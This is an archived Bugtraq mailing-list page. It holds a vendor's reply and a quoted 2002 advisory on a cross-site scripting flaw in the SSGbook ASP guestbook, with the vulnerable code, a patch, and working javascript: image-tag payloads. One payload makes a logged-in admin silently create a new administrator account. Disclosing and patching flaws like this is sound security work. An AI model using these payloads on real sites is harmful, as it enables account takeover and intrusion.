Bugtraq mailing list archives
Re: SSGbook (ASP)
From: Terry Bankert <tbankert () script-shed com>
Date: 1 Oct 2003 21:11:44 -0000
In-Reply-To: <F127ak1HTJcwXAtPyFC00019ee5 () hotmail com> This issue has been fixed
Received: (qmail 27350 invoked from network); 8 Oct 2002 17:28:07 -0000 Received: from outgoing2.securityfocus.com (HELO outgoing.securityfocus.com) (205.206.231.26) by mail.securityfocus.com with SMTP; 8 Oct 2002 17:28:07 -0000 Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19]) by outgoing.securityfocus.com (Postfix) with QMQP id D0E078F2A1; Tue, 8 Oct 2002 10:36:42 -0600 (MDT) Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq () securityfocus com> List-Help: <mailto:bugtraq-help () securityfocus com> List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com> List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com> Delivered-To: mailing list bugtraq () securityfocus com Delivered-To: moderator for bugtraq () securityfocus com Received: (qmail 25496 invoked from network); 8 Oct 2002 17:08:44 -0000 X-Originating-IP: [80.236.134.100] From: "Frog Man" <leseulfrog () hotmail com> To: bugtraq () securityfocus com Subject: SSGbook (ASP) Date: Tue, 08 Oct 2002 19:31:54 +0200 Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1; format=flowed Message-ID: <F127ak1HTJcwXAtPyFC00019ee5 () hotmail com> X-OriginalArrivalTime: 08 Oct 2002 17:31:54.0466 (UTC) FILETIME=[9835BC20:01C26EF0] Informations : °°°°°°°°°°°°°° Product : SSGbook Langage : ASP Tested version : 1 Website : http://www.script-shed.com Problem : Cross Site Scripting PHP Code / location : °°°°°°°°°°°°°°°°°°°°° ----------------- config.asp ---------------------- fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>") fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>") fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>") fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>") fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>") fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>") ----------------- config.asp ---------------------- Exploit : °°°°°°°°° [image]javascript:{SCRIPT}[/image] [img=right]javascript:{SCRIPT}[/img=right] [image=right]javascript:{SCRIPT}[/image=right] [img=left]javascript:{SCRIPT}[/img=left] [image=left]javascript:{SCRIPT}[/image=left] [img]javascript:{SCRIPT}[/img] e.g. : [image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image] Add an admin if an admin read it. Login : Pom, Password : turlututu Patch : °°°°°°° In config.asp : Add this line : strOutput = Replace(strOutput, chr(34), """) after ---------------------------------------------- strOutput = Replace(strOutput, "<", "<") strOutput = Replace(strOutput, ">", ">") ---------------------------------------------- And replace this lines : ------------------------------------------------ fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>") fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>") fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>") fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>") fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>") fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>") ------------------------------------------------ by : ------------------------------------------------ fString = doCode(fString, "[img]http://","[/img]","<img src=""http://",""" border=0>") fString = doCode(fString, "[image]http://","[/image]","<img src=""http://",""" border=0>") fString = doCode(fString, "[img=right]http://","[/img=right]","<img align=right src=""http://",""" id=right border=0>") fString = doCode(fString, "[image=right]http://","[/image=right]","<img align=right src=""http://",""" id=right border=0>") fString = doCode(fString, "[img=left]http://","[/img=left]","<img align=left src=""http://",""" id=left border=0>") fString = doCode(fString, "[image=left]http://","[/image=left]","<img align=left src=""http://",""" id=left border=0>") ------------------------------------------------ More details in french : http://www.frog-man.org/tutos/SSGbook.txt translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ Discutez en ligne avec vos amis ! http://messenger.msn.fr
Current thread:
- Re: SSGbook (ASP) Terry Bankert (Oct 01)